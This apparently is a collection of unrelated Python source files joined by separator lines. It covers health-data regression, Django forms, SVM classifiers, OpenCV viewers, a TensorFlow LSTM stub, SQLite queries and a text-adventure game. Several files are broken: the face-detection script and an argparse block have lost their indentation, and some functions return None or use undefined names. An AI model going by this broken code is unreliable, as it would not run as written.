    prediction = model.predict(x, verbose=0)
    index = numpy.argmax(prediction)
    result = int_to_char[index]
    seq_in = [int_to_char[value] for value in pattern]
    print (seq_in, "->", result)
# COMMAND ----------
|
# Python for Healthcare
## 500 Cities Linear Regression

### Import Standard Libraries
import os  # Included in every script DC!
import pandas as pd  # Included in every code script for DC!
import numpy as np  # Included in every code script for DC!

### Set working directory to project folder
os.chdir("C:/Users/drewc/GitHub/python-for-healthcare/pylessons/pymodule4")  # Set wd to project repository

### Verify
print("Ready")  # Print result

#################### Break ####################

# Section A: 500 Cities Analysis
print("Section A: Start")  # Print result

## Step 1: Import Libraries and Data

### Import Statistics Packages
import statsmodels.api as sm  # Regression modeling (statsmodels, scipy-based)

### Import Visualization Packages
import matplotlib.pyplot as plt  # Comprehensive graphing package in python

### Import 500 Cities Data
df_five = pd.read_csv("_data/fivecities_stage.csv", encoding = "ISO-8859-1")  # Import dataset saved as csv in _data folder

## Step 2: Prepare Data for Analysis

### Select only State and Measure
df_filter = df_five.filter(["Diabetes", "ChildAsthma"])  # Keep only selected columns

### Drop NA values
df_na = df_filter.dropna()  # Drop all rows with NA values

### Rename Dataframe
df_dmca = df_na  # Rename filtered dataframe for clarity

### Verify
df_dmca.info()  # Get class, memory, and column info: names, data types, obs.
df_dmca.head()  # Print first 5 observations

## Step 3: Conduct Analysis and Tests

### Linear Regression Model
x = df_dmca["ChildAsthma"]  # Save feature as x
y = df_dmca["Diabetes"]  # Save outcome variable as y
# NOTE(review): no constant term is added — this fits a regression through
# the origin; use sm.add_constant(x) if an intercept is intended.
model = sm.OLS(y, x).fit()  # Run Linear Regression Model. This may but most likely wont take time
result = model.summary()  # Create Summary of final model

### Create Results Text File
text_file = open("_fig/diabetes_asthma_model.txt", "w")  # Open text file and name with subproject, content, and result suffix. To write or overwrite a new file, type "w". To append, type "a".
text_file.write(str(result))  # Line of text with string version of a data object
text_file.close()  # Close file

### Verify Regression
print(result)  # Print result to verify

## Step 4: Create Visuals and Outputs

### Create Figure
plt.figure()  # Create blank figure before creating plot

### Create Scatter Plot
plt.scatter(df_dmca["ChildAsthma"], df_dmca["Diabetes"], c = "b")  # Create scatter plot with (x axis, y axis, color)

### Set Labels and Titles
plt.ylabel("Estimated Prevalence of Type 2 Diabetes")  # Label Y axis
plt.xlabel("Estimated Prevalence of ChildAsthma")  # Label for X Axis
plt.title("CDC 500 Cities 2019 Data: Child Asthma and Diabetes")  # Title above the plot

### Save to figure file
plt.savefig("_fig/diabetes_asthma_scatter.jpeg", bbox_inches = "tight")  # Save figure file to _fig in directory, use tight to make a good looking image

### Verify
plt.show()  # Show plot
from django.contrib.auth.forms import AuthenticationForm, UsernameField
from django import forms
from django.contrib.auth import (
authenticate, get_user_model, password_validation,
)
from django.contrib.auth.hashers import (
UNUSABLE_PASSWORD_PREFIX, identify_hasher,
)
from django.contrib.auth.models import User
from django.contrib.auth.tokens import default_token_generator
from django.contrib.sites.shortcuts import get_current_site
from django.core.mail import EmailMultiAlternatives
from django.template import loader
from django.utils.encoding import force_bytes
from django.utils.http import urlsafe_base64_encode
from django.utils.text import capfirst
from django.utils.translation import gettext, gettext_lazy as _
from django.contrib.auth.forms import UserCreationForm, UserChangeForm
from .models import CustomUser
from django.contrib.auth.forms import SetPasswordForm
from django.forms import ModelForm
# from phone_field import PhoneField, PhoneWidget, PhoneFormField
UserModel = get_user_model()
class CustomUserCreationForm(UserCreationForm):
    """Creates an unprivileged user from an email address and password."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # del self.fields['username']

    class Meta:
        model = CustomUser
        fields = ("email",)
class CustomUserChangeForm(UserChangeForm):
    """Edits an existing user; the password is shown as the admin's
    read-only hash display instead of a plain field."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # del self.fields['username']

    class Meta:
        model = CustomUser
        fields = ("email",)
class CustomSetPasswordForm(SetPasswordForm):
    """SetPasswordForm variant: empty labels, Russian placeholder texts."""
    error_messages = {
        'password_mismatch': _("The two password fields didn't match."),
    }
    new_password1 = forms.CharField(
        label=_(""),
        widget=forms.PasswordInput(
            attrs={
                'placeholder': 'Новый пароль'
            }
        ),
        strip=False,
        help_text='',
    )
    new_password2 = forms.CharField(
        label=_(""),
        strip=False,
        widget=forms.PasswordInput(
            attrs={
                'placeholder': 'Повторите пароль еще раз'
            }
        ),
    )
# class CustomPhoneFormField(PhoneFormField):
# widget = PhoneWidget
class CustomUserForm(forms.ModelForm):
    """Basic profile form (name + phone) using placeholder-only styling."""

    first_name = forms.CharField(
        label=_(""),
        max_length=200,
        widget=forms.TextInput(attrs={'placeholder': 'Имя'}),
    )
    last_name = forms.CharField(
        label=_(""),
        max_length=200,
        widget=forms.TextInput(attrs={'placeholder': 'Фамилия'}),
    )
    phone = forms.CharField(
        label=_(""),
        max_length=12,
        widget=forms.TextInput(attrs={'placeholder': 'Телефон'}),
    )

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

    class Meta:
        model = CustomUser
        fields = ('first_name', 'last_name', 'phone')
class ChangeUsersProfiles(CustomUserForm):
    """Admin-side profile editor: CustomUserForm plus account/billing fields.

    Labels/placeholders are localized in __init__ because most fields are
    generated by the ModelForm machinery rather than declared here.
    """
    is_active = forms.BooleanField(
        label=_("Доступ в Веб-интерфейс"),
        # help_text='Required - email',
        widget=forms.CheckboxInput(),
        required=False
    )

    def __init__(self, *args, **kargs):
        super(ChangeUsersProfiles, self).__init__(*args, **kargs)
        self.fields['phone'].label = 'Телефон'
        self.fields['phone'].widget.attrs['placeholder'] = 'Телефон'
        self.fields['phone'].widget.attrs['required'] = 'True'
        self.fields['phone'].help_text = None
        self.fields['email'].label = 'E-mail'
        self.fields['email'].widget.attrs['placeholder'] = 'E-mail'
        self.fields['email'].help_text = None
        self.fields['first_name'].label = 'Имя'
        self.fields['first_name'].widget.attrs['placeholder'] = 'Имя'
        self.fields['first_name'].help_text = None
        self.fields['last_name'].label = 'Фамилия'
        self.fields['last_name'].widget.attrs['placeholder'] = 'Фамилия'
        self.fields['last_name'].help_text = None
        self.fields['balance'].label = 'Баланс'
        self.fields['balance'].widget.attrs['placeholder'] = 'Баланс'
        self.fields['balance'].help_text = None
        self.fields['cardId'].label = 'ID карты'
        self.fields['cardId'].widget.attrs['placeholder'] = 'ID карты'
        self.fields['cardId'].help_text = None
        self.fields['groups'].label = 'Группа'
        self.fields['groups'].help_text = None

    class Meta:
        model = CustomUser
        fields = ('phone', 'first_name', 'last_name', 'email', 'groups', 'balance', 'cardId', 'is_active', 'cardNumber')

    def save(self, *args, **kwargs):
        # NOTE(review): ModelForm.save() already applies cleaned_data to the
        # instance, so the manual re-assignment and second save() below are
        # redundant — confirm before simplifying.
        super().save(*args, **kwargs)
        self.instance.first_name = self.cleaned_data.get('first_name')
        self.instance.last_name = self.cleaned_data.get('last_name')
        self.instance.email = self.cleaned_data.get('email')
        self.instance.phone = self.cleaned_data.get('phone')
        self.instance.is_active = self.cleaned_data.get('is_active')
        self.instance.cardNumber = self.cleaned_data.get('cardNumber')
        self.instance.save()
class CustomAddUser(ChangeUsersProfiles):
    """Admin "add user" form — same field set as ChangeUsersProfiles."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

    class Meta:
        model = CustomUser
        fields = ('phone', 'first_name', 'last_name', 'email', 'groups', 'balance', 'cardId', 'is_active', 'cardNumber')
|
# -*- coding: utf-8 -*-
"""
Created on Wed Jul 28 14:51:32 2021
@author: Hewlett-Packard
"""
from sklearn.model_selection import KFold
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn import svm
from sklearn import metrics
from sklearn.metrics import confusion_matrix, classification_report
import pandas as pd
import numpy as np
class CM:
    """K-fold cross-validation of SVM text classifiers on TF-IDF features.

    Each public method returns (confusion_matrices, fold_accuracies,
    mean_accuracy) for one SVM kernel.  The methods take no `self` and are
    intended to be called on the class, e.g. CM.LinearSVM(k, X, y).
    The original file repeated the whole CV loop three times; the shared
    logic now lives in _cross_validate.
    """

    @staticmethod
    def _cross_validate(make_clf, k, X, y):
        """Run k-fold CV, fitting a fresh TF-IDF vectorizer per fold.

        make_clf -- zero-argument factory returning an unfitted classifier.
        Returns (confusion matrices, per-fold accuracies, mean accuracy).
        """
        folds = KFold(n_splits=k)
        akurasi = []
        recall = []
        precision = []
        cm = []
        for train_index, test_index in folds.split(X):
            X_train, X_test = X[train_index], X[test_index]
            y_train, y_test = y[train_index], y[test_index]
            # fit the vectorizer on the training fold only (no leakage)
            vectorizer = TfidfVectorizer(norm='l1')
            X_train = vectorizer.fit_transform(X_train)
            X_test = vectorizer.transform(X_test)
            clf = make_clf()
            clf.fit(X_train, y_train)
            y_pred = clf.predict(X_test)
            akurasi.append(metrics.accuracy_score(y_test, y_pred))
            # NOTE(review): recall/precision are computed but never returned,
            # mirroring the original implementation.
            recall.append(metrics.recall_score(y_test, y_pred))
            precision.append(metrics.precision_score(y_test, y_pred))
            cm.append(confusion_matrix(y_test, y_pred))
        return cm, akurasi, np.mean(akurasi)

    def LinearSVM(k, X, y):
        """Linear-kernel SVM (C=10)."""
        return CM._cross_validate(lambda: svm.SVC(kernel='linear', C=10), k, X, y)

    def RbfSVM(k, X, y):
        """RBF-kernel SVM (C=5, gamma=9)."""
        return CM._cross_validate(lambda: svm.SVC(kernel='rbf', C=5, gamma=9), k, X, y)

    def PolySVM(k, X, y):
        """Degree-2 polynomial-kernel SVM (C=35, gamma='scale')."""
        return CM._cross_validate(lambda: svm.SVC(kernel='poly', C=35, gamma='scale', degree=2), k, X, y)
__author__ = 'dowling'
import logging
ln = logging.getLogger(__name__)
from mongokit import Document
from model.db import connection
from model.db import db
class Fridge(Document):
    """Mongo document (mongokit) tracking per-item quantities in a fridge."""
    structure = {
        'content': {
            unicode: int
        }
    }
    use_dot_notation = True
    use_autorefs = True

    def transact_item(self, item, quantity):
        """Adjust the stored quantity of `item` by `quantity`.

        Negative quantities take items out, positive ones put items in.
        Unknown items are treated as previous quantity 0 (with a warning).
        """
        old_quantity = self.content.get(item, None)
        if quantity < 0:  # take out
            if old_quantity is None:
                old_quantity = 0
                ln.warn("Attempting to take item %s out of fridge, but previous value was %s" % (item, old_quantity))
        else:  # put in
            if old_quantity is None:
                old_quantity = 0
                # fix: log the amount being added; the original logged
                # old_quantity, which is always 0 on this path
                ln.warn("Adding new item %s (quantity %s)" % (item, quantity))
            ln.debug("Putting %s of %s into fridge" % (quantity, item))
        # debug `print` statements removed (leftover Python 2 debugging)
        self.content[item] = old_quantity + quantity
# Register the document class with mongokit and grab the backing collection.
connection.register([Fridge])
fridge_collection = db.fridges
#fridge = fridge_collection.Fridge()
#fridge.save()
#fridge.reload()
def get_fridge():
    """Return the fridge document, preferring one that has content.

    Creates and persists a fresh Fridge when none exist at all; otherwise
    falls back to the first stored (empty) fridge.
    """
    fridges = list(fridge_collection.Fridge.find())
    for candidate in fridges:
        if candidate.content:
            return candidate
    if fridges:
        return fridges[0]
    fresh = fridge_collection.Fridge()
    fresh.save()
    fresh.reload()
    return fresh
|
from collections import Counter

# Print the three most frequent characters of the input line,
# ties broken alphabetically.
text = input()
counts = Counter(text)
ranked = sorted(counts.items(), key=lambda pair: (-pair[1], pair[0]))
for letter, count in ranked[:3]:
    print(letter, count)
|
""" Experiment with face detection and image filtering using OpenCV """
import cv2
import numpy as np
cap = cv2.VideoCapture(0)
face_cascade = cv2.CascadeClassifier('/home/audrey/ToolBox-ComputerVision/haarcascade_frontalface_alt.xml')
kernel = np.ones((21,21),'uint8')
while(True):
# Capture frame-by-frame
ret, frame = cap.read()
faces = face_cascade.detectMultiScale(frame, scaleFactor=1.2, minSize=(20,20))
for (x,y,w,h) in faces:
frame[y:y+h,x:x+w,:] = cv2.dilate(frame[y:y+h,x:x+w,:], kernel)
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,0,255))
cv2.circle(frame, (int(x+w/4),int(y+h/3)), 15, (255,0,0),-1)
cv2.circle(frame, (int(x+3*w/4),int(y+h/3)), 15, (255,0,0),-1)
cv2.ellipse(frame, (int(x+w/2),int(y+2*h/3)), (20,40), 0, 0, 180, (0,0,255),10)
# Display the resulting frame
cv2.imshow('frame',frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# When everything done, release the capture
cap.release()
cv2.destroyAllWindows() |
import unittest
import smart_match
class TestHammingDistance(unittest.TestCase):
    """Tests for the smart_match package in Hamming-distance ('HD') mode."""

    def setUp(self):
        smart_match.use('HD')

    def test_distance(self):
        # distance = number of differing positions (equal-length strings)
        self.assertEqual(smart_match.distance('12211','11111'), 2)
        self.assertEqual(smart_match.distance('hello','heool'), 3)

    def test_similarity(self):
        # similarity = 1 - distance/length
        self.assertEqual(smart_match.similarity('12211','11111'), 0.6)
        self.assertEqual(smart_match.similarity('hello','heool'), 0.4)

if __name__=='__main__':
    unittest.main()
|
import sys
class Solution(object):
    def maxSubArray(self, nums):
        """Kadane's algorithm: largest sum of any contiguous subarray.

        :type nums: List[int]
        :rtype: int
        """
        best = -sys.maxsize   # best subarray sum seen so far
        running = 0           # best sum of a subarray ending at the current element
        for value in nums:
            # either extend the previous run or start fresh at `value`
            running = max(value, running + value)
            if running > best:
                best = running
        return best
# Smoke test: the classic Kadane example; the expected answer is 6.
nums = [-2, 1, -3, 4, -1, 2, 1, -5, 4]
# Output: 6
sol = Solution()
print(sol.maxSubArray(nums))
|
'''
Don't believe everything below...
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import argparse, os
import tensorflow as tf
from tensorflow.contrib.rnn import BasicLSTMCell
from toy_data import prepare_data
def next_batch(train_data):
    """Stub batch sampler — not implemented.

    NOTE(review): always returns None, but main() unpacks the result into
    (batch_x, batch_y); training will crash until this is implemented.
    """
    return None
def main(model, n_iter, n_batch, n_hidden):
    """Build and train a TF1 LSTM on the toy sequence task.

    model/n_iter/n_batch/n_hidden come from the CLI; `model` is currently
    unused — only the LSTM path is implemented.
    """
    # --- Set data params ----------------
    n_input = 10 * 4
    n_output = 4 * 4
    n_classes = 5
    # --- Prepare data -------------
    train_data, test_data = prepare_data()
    # --- Create graph and compute gradients ----------------------
    x = tf.placeholder("float", [None, n_input, n_classes])
    y = tf.placeholder("float", [None, n_output, n_classes])
    V_init_val = np.sqrt(6.)/np.sqrt(n_classes * 2)  # Glorot-style init range
    # --- Input to hidden layer ----------------------
    cell = BasicLSTMCell(n_hidden, state_is_tuple=True, forget_bias=1)
    hidden_out, _ = tf.nn.dynamic_rnn(cell, x, dtype=tf.float32)
    # --- Hidden Layer to Output ----------------------
    V_weights = tf.get_variable("V_weights", shape = [n_hidden, n_classes], \
        dtype=tf.float32, initializer=tf.random_uniform_initializer(-V_init_val, V_init_val))
    V_bias = tf.get_variable("V_bias", shape=[n_classes], \
        dtype=tf.float32, initializer=tf.constant_initializer(0.01))
    # project only the last n_output timesteps to class scores
    hidden_out_list = tf.unstack(hidden_out, axis=1)
    temp_out = tf.stack([tf.matmul(i, V_weights) for i in hidden_out_list[-n_output:]])
    output_data = tf.nn.bias_add(tf.transpose(temp_out, [1,0,2]), V_bias)
    # --- evaluate process ----------------------
    mse = tf.reduce_mean(tf.squared_difference(y, output_data))
    # --- Initialization ----------------------
    optimizer = tf.train.RMSPropOptimizer(learning_rate=0.001, decay=0.9).minimize(mse)
    init = tf.global_variables_initializer()
    # --- Training Loop ----------------------
    with tf.Session(config=tf.ConfigProto(log_device_placement=False, allow_soft_placement=False)) as sess:
        sess.run(init)
        step = 0
        steps = []
        mses = []
        while step < n_iter:
            # NOTE(review): next_batch() returns None — this unpacking will
            # fail until a real batch sampler is implemented.
            batch_x, batch_y = next_batch(n_batch)
            sess.run(optimizer, feed_dict={x: batch_x, y: batch_y})
            mse_value = sess.run(mse, feed_dict={x: batch_x, y: batch_y})
            print("Iter " + str(step) + ", MSE= " + "{:.6f}".format(mse_value))
            steps.append(step)
            mses.append(mse_value)
            step += 1
    print("Optimization Finished!")
if __name__=="__main__":
parser = argparse.ArgumentParser(
description="RNN Toy Task")
parser.add_argument("model", default='LSTM', help='Model name: LSTM, EURNN, uLSTM, resNet')
parser.add_argument('--n_iter', '-I', type=int, default=10000, help='training iteration number')
parser.add_argument('--n_batch', '-B', type=int, default=128, help='batch size')
parser.add_argument('--n_hidden', '-H', type=int, default=1024, help='hidden layer size')
args = parser.parse_args()
dict = vars(args)
for i in dict:
if (dict[i]=="False"):
dict[i] = False
elif dict[i]=="True":
dict[i] = True
kwargs = {
'model': dict['model'],
'n_iter': dict['n_iter'],
'n_batch': dict['n_batch'],
'n_hidden': dict['n_hidden'],
}
main(**kwargs)
|
import sqlite3

# Run a fixed set of report queries against the sample "world" database.
db = sqlite3.connect("world.db")
cr = db.cursor()
ans = cr.execute("SELECT name FROM country WHERE population > 100000000")
print("1-\n", ans.fetchall(), "\n")
ans = cr.execute("SELECT name FROM country WHERE name like '%land'")
print("2-\n", ans.fetchall(), "\n")
ans = cr.execute("SELECT name FROM city WHERE Population BETWEEN 500000 and 1000000")
print("3-\n", ans.fetchall(), "\n")
ans = cr.execute("SELECT name FROM country WHERE Continent = 'Europe'")
print("4-\n", ans.fetchall(), "\n")
ans = cr.execute("SELECT name FROM country ORDER BY SurfaceArea DESC")
print("5-\n", ans.fetchall(), "\n")
ans = cr.execute("SELECT name FROM city WHERE CountryCode = 'NLD'")
print("6-\n", ans.fetchall(), "\n")
ans = cr.execute("SELECT Population FROM city WHERE name = 'Amsterdam'")
print("7-\n", ans.fetchall(), "\n")
ans = cr.execute("SELECT city.name FROM city INNER JOIN country on city.CountryCode = country.Code WHERE Continent = 'Europe' ORDER BY city.Population DESC LIMIT 1")
print("8-\n", ans.fetchall(), "\n")
ans = cr.execute("SELECT name FROM country WHERE Continent = 'Africa' ORDER BY SurfaceArea DESC LIMIT 1")
print("9-\n", ans.fetchall(), "\n")
ans = cr.execute("SELECT name FROM country WHERE Continent = 'Asia' ORDER BY SurfaceArea DESC LIMIT 10")
print("10-\n", ans.fetchall(), "\n")
ans = cr.execute("SELECT name FROM country ORDER BY SurfaceArea LIMIT 1")
print("11-\n", ans.fetchall(), "\n")
ans = cr.execute("SELECT name FROM city ORDER BY Population DESC LIMIT 10")
print("12-\n", ans.fetchall(), "\n")
ans = cr.execute("SELECT sum(population) FROM country ")
print("13-\n", ans.fetchall(), "\n")

# fix: the connection was never closed (resource leak)
db.close()
|
import cv2
import numpy as np
class Zoom(object):
    """Interactive viewer: left-drag selects a region to zoom into,
    right-click resets to the original image, ESC closes."""

    def __init__(self, window, img):
        self.window = window
        self.img0 = img   # pristine copy, used by the right-click reset
        self.img = img    # currently displayed (possibly zoomed) image
        self.left_clicked = False
        self.xm0, self.ym0 = 0,0  # drag start corner
        cv2.namedWindow(self.window)
        cv2.setMouseCallback(self.window, self.onmouse)
        self.img = cv2.resize(img, (850, 1000), interpolation=cv2.INTER_LINEAR)
        self.nwindow = "zoom"
        self.show()

    def show(self):
        """Blocking display loop; exits (and destroys windows) on ESC."""
        # print(self.img.shape)
        cv2.moveWindow(self.nwindow,400,0)
        while True:
            cv2.imshow(self.nwindow, self.img)
            key = cv2.waitKey(1)
            if key != -1:
                print(key)
            if key == 27:  # ESC
                break
        cv2.destroyAllWindows()

    def onmouse(self, event, x, y, flags, param):
        """Mouse callback: implements drag-to-zoom and right-click reset."""
        if event == cv2.EVENT_LBUTTONDOWN:
            self.left_clicked = True
            self.xm0, self.ym0 = x, y
        elif event == cv2.EVENT_LBUTTONUP:
            if self.left_clicked:
                # normalize so (xm0, ym0) is the top-left corner
                if self.xm0 > x:
                    self.xm0, x = x, self.xm0
                if self.ym0 > y:
                    self.ym0, y = y, self.ym0
                ancho, alto = (x - self.xm0), (y - self.ym0)  # width, height
                propor = self.img.shape[0] / self.img.shape[1]  # image aspect ratio
                k = alto / ancho
                # grow the short side of the selection to keep the aspect ratio
                if propor >= 1:
                    if k < 1:
                        alto = int(ancho * propor)
                    else:
                        ancho = int(alto / propor)
                self.img = self.img[self.ym0: self.ym0 + alto, self.xm0: self.xm0 + ancho]
                self.img = cv2.resize(self.img, (850, 1000), interpolation=cv2.INTER_LINEAR)
                self.left_clicked = False
        elif event == cv2.EVENT_RBUTTONDOWN:
            self.img = cv2.resize(self.img0, (850, 1000), interpolation=cv2.INTER_LINEAR)
# Load the demo image and start the interactive zoom viewer (blocks until ESC).
img = cv2.imread('ValtodaD.jpg')
Zoom('zoom', img)
|
'''
70. データの入手・整形
文に関する極性分析の正解データを用い,以下の要領で正解データ(sentiment.txt)を作成せよ.
1. rt-polarity.posの各行の先頭に"+1 "という文字列を追加する
(極性ラベル"+1"とスペースに続けて肯定的な文の内容が続く)
2. rt-polarity.negの各行の先頭に"-1 "という文字列を追加する
(極性ラベル"-1"とスペースに続けて否定的な文の内容が続く)
3. 上述1と2の内容を結合(concatenate)し,行をランダムに並び替える
sentiment.txtを作成したら,正例(肯定的な文)の数と負例(否定的な文)の数を確認せよ.
'''
import os
import sys
import random
import tarfile
def message(text):
    """Write *text* to stderr in bright green (ANSI escape), newline-terminated."""
    print(f"\33[92m{text}\33[0m", file=sys.stderr)
POS = '.pos'
NEG = '.neg'
ALL = '.all'

# Build sentiment.txt: label every rt-polarity line with +1/-1, then shuffle.
data = {}
with tarfile.open("rt-polaritydata.tar.gz", 'r:gz') as tar:
    for tarinfo in tar:
        root, ext = os.path.splitext(tarinfo.name)
        if ext not in (POS, NEG):  # select archive members by extension
            continue
        message(tarinfo.name)
        label = "+1" if ext == POS else "-1"
        with tar.extractfile(tarinfo.name) as f:
            data[ext] = [
                f"{label} {line.decode('latin-1').rstrip()}\n" for line in f]
        print(f"{ext}: {len(data[ext])}")

data[ALL] = data[POS] + data[NEG]
random.seed(123)  # fixed seed so the shuffle is reproducible
random.shuffle(data[ALL])
with open('./sentiment.txt', 'w') as f:
    f.writelines(data[ALL])
'''
* 「sentence polarity dataset v1.0」の取説
http://www.cs.cornell.edu/people/pabo/movie-review-data/rt-polaritydata.README.1.0.txt
* tarfile モジュール
https://docs.python.org/ja/3/library/tarfile.html
* random モジュール
https://docs.python.org/ja/3/library/random.html
* コマンド
$ grep "^+1" ./sentiment.txt | wc -l
5331
$ grep "^-1" ./sentiment.txt | wc -l
5331
'''
|
import cmd
import textwrap
import sys
import os
#import math
#import copy
#from pydub import AudioSegment
#from pydub.playback import play
#from text_utilities import *
from item import*
from Player import*
from json_handler import*
from move import*
screen_width = 60
### Title Screen ###
def title_screen_selections():
    """Read the title-menu choice and dispatch to the matching screen."""
    choice = prompt_select_from("", ["play", "help", "quit"], "Please enter a valid command.")
    if choice == "play":
        start_game()
    elif choice == "help":
        help_menu()
    else:
        sys.exit()
def title_screen():
    """Clear the terminal, draw the title banner/menu, and prompt."""
    clear()
    print_intense("Marpshwallow!")
    for line in (" -Play- ",
                 " -Help- ",
                 " -Quit- ",
                 " --Copyright 2019 avaughan.me--"):
        print(line)
    title_screen_selections()
def help_menu():
    """Print the help text, then return to the title-menu prompt."""
    for line in ("###############################",
                 "Welcome to Marshmallow Recruitment Laboratories Inc.",
                 "###############################",
                 "Use up, down, left, pizza to move.",
                 "marshmallow your commands",
                 "Use something like 'look' or\n'examine' to inspect something",
                 "Figure it out! You're in a pop topping rock tipping hot topping talbo-dee-doo!"):
        print(line)
    title_screen_selections()
def setup_game():
    """Initialize the player and start the main loop.

    `slow` toggles the scripted (slow-typed) intro; it is hard-coded off,
    which also skips the name prompt.
    """
    slow = False
    if slow:
        myPlayer.name = slow_prompt("Howdy Doo! \nWho Are You?")
    else:
        myPlayer.name = "Fartmonster"
    myPlayer.reset_hp_mp()
    if slow:
        #ques_1()
        intro()
        clear()
        print("########################\n## IT BEGINS TO ITCH ###\n########################\n")
        main_game_loop()
    else:
        clear()
        print_intense("########################\n## IT BEGINS TO ITCH ###\n########################\n")
        myPlayer.print_location()
        main_game_loop()
def intro():
    """Scripted opening scene: the player flails in a shallow swamp.

    Both choices are flavor only — neither affects game state.
    """
    slow_print_ack("Swim, " + myPlayer.name + "!\nSWiM!!", t = 0.02)
    inp = prompt_select_from("What are you doing?\n Swim!!!\n", ['drown', 'swim'], "You're gonna die!")
    if inp == "swim":
        slow_print_ack("The water is too shallow. . .\n", t = 0.03)
        slow_print_ack("No matter how hard you try, the swamp just isn't a good place\nfor exercise.")
        slow_print_ack("And if you slough around here too long you could\nwind up getting that weird rash again.", t = 0.03)
        time.sleep(0.5)
    elif inp == "drown":
        slow_print_ack("You lazily set yourself adrift atop the murky waters. . . \n", t = 0.03)
        slow_print_ack("Despite your best efforts, the swamp waters are too shallow to drown in.\n", t = 0.03)
###GAME INTERACTIVITY###
#def make_sound():
# alarm = AudioSegment.from_wav("Alarm01.wav")
# play(alarm)
def god_mode():
    """Developer menu: toggles debug capabilities on the player.

    Recurses back into itself after each toggle; 'd'/'e' return to the
    normal action prompt instead.
    """
    inp = prompt_select_from("Sup?\n A) Room Editor\n B) Teleport\n C) Keys\n D) Restore Defaults\n E) Exit\n>>>", ['a', 'b', 'c', 'd', 'e', 'doughnut'], "Choose either A, B, C, D, OR E\n>>>")
    if inp == 'a':
        myPlayer.editrooms = True
        print ("Room editor commands enabled")
        god_mode()
    elif inp == 'b':
        myPlayer._teleport = True
        print ("teleport commands enabled")
        god_mode()
    elif inp == 'c':
        myPlayer.keys = True
        print ("Room lock control enabled")
        god_mode()
    elif inp == 'd':
        # turn every debug flag back off
        slow_print("Everything is back to norbal !\n")
        myPlayer.editrooms = False
        myPlayer._teleport = False
        myPlayer.keys = False
        prompt()
    elif inp == 'e':
        slow_print("I hope you made a fucking difference.", t=0.05, )
        prompt()
    else:
        print_intense("AHHH!!\nDOUGHNUT!!\n")
        god_mode()
def lookup_address_by_name(name):
    """Resolve a room name to its address; return None when unknown.

    fix: the original required the name to exist in BOTH lookup tables
    (the first lookup's result was immediately overwritten, and a miss in
    either raised KeyError), and its failure path returned a 2-tuple
    (None, None) that callers compared against plain None, so invalid
    destinations were never rejected.  Special locations now take
    precedence, with the regular zonemap as fallback.
    """
    address = special_lookup_address_by_name.get(name)
    if address is None:
        address = zonemap_lookup_address_by_name.get(name)
    return address
def player_teleport(myAction):
    """Prompt for a destination until a valid one is given, then move there."""
    while True:
        dest = input("Where would you like to teleport?\n")
        dest_address = lookup_address_by_name(dest)
        if dest_address is None:
            print("That is not a valid destination, try again")
        else:
            print("\n" + "you have teleported to " + dest + ".\n")
            myPlayer.location = dest_address
            myPlayer.print_location()
            prompt()
            # fix: the original looped forever, asking for another
            # destination after every successful teleport
            return
def player_examine(action):
    """Report whether the current room's puzzle is solved.

    NOTE(review): `Solved` is not defined anywhere in this file — this
    likely raises NameError at runtime (perhaps the string key 'Solved'
    was intended).
    """
    if zonemap[myPlayer.location][Solved]:
        print("Solved")
    else:
        print("Unsolved")
    ####Trigger event.
###GAME FUNCTIONALITY###
def start_game():
    """Begin a new game from the title menu.

    NOTE(review): setup_game() already runs main_game_loop(); the second
    call below only re-checks game_over — confirm before removing.
    """
    clear()
    setup_game()
    main_game_loop()
    return
def main_game_loop():
    """Repeat the action prompt until the player's game_over flag is set."""
    while myPlayer.game_over is False:
        prompt()
    ### here handle if game has been solved
def prompt():
    """Main action prompt: read one command and dispatch it."""
    print("\n" + "=====================")
    # I want to add: look, glance, read, climb, take, 'eat', 'drink', 'back', blah blah blah I want this to all be in a json file, daddy.
    acceptable_actions = ['sit', 'stand', 'sound', 'help', 'move', 'go', 'walk', 'quit', 'examine', 'scratch', 'glance', 'look', 'look at', 'onscreen', 'baswash', 'teleport', 'dev']
    action = prompt_select_from("What would you like to do?", acceptable_actions, "Unknown action, tryangle again.")
    if action.lower() == 'quit':
        # fix: the original compared the builtin `input` *function* against
        # implicitly-concatenated string literals, so quitting never worked
        confirm = input("ARE YOU SURE YOU WANT TO QUIT? y/n*\n>>>")
        if confirm.lower() in ('y', 'yes'):
            sys.exit()
        else:
            prompt()
    elif action.lower() in ['sound']:
        make_sound()
    elif action.lower() in ['help']:
        cry_for_help()
    elif action.lower() in ['move', 'go', 'walk']:
        player_move(action.lower(), zonemap, myPlayer)
    elif action.lower() in ['glance']:
        myPlayer.player_glance()
    elif action.lower() in ['look']:
        myPlayer.player_look()
    elif action.lower() in ['onscreen']:
        myPlayer.print_location()
    elif action.lower() in ['baswash']:
        god_mode()
    elif action.lower() in ['scratch']:
        slow_print_ack("You can't scratch this itch.\nI'm sorry.")
    elif action.lower() in ['sit']:
        slow_print_ack("You sit on the wet ground.\n", t = .08)
    elif action.lower() in ['stand']:
        # fix: `action.lower` was missing its call parentheses, so this
        # branch could never match
        slow_print_ack("You feel the ground under your socks.\n", t = 0.05)
    elif action.lower() in ['dev']:
        if myPlayer.editrooms is True:
            room_edit_prompt()
        else:
            slow_print("You can't do that without permission.")
            prompt()
    elif action.lower() in ['teleport']:
        if myPlayer.can_teleport():
            player_teleport(action.lower())
        else:
            slow_print("You can't do that without permission.")
            prompt()
def cry_for_help():
    """Flavor response to the 'help' command — nobody answers."""
    slow_print_ack("HELP!\n", t = 0.05)
    slow_print_ack("HEEEEEEELP!!!!\n", t = 0.03)
    slow_print_ack("... ... ...\n", t = 0.04)
    slow_print_ack("No answer, but you think you hear the sound of distant drums.\nBetter hunker down and lay low.", t = 0.03)
# Module entry: create the player and show the title screen on import/run.
myPlayer = Player(zonemap)
#myRoom = Room()
title_screen()
##### def room_edit_prompt():
# inp = prompt_select_from("A)New Room\n B)Edit this room\n C)Exit", ['a', 'b', 'c'], "Try again.")
# inp = inp.lower()
#if inp == 'a':
# create_new_room(myRoom)
# elif inp == 'b':
# edit_room()
# elif inp == 'c':
# slow_print("Sam hands the ring back to Frodo")
# prompt()
|
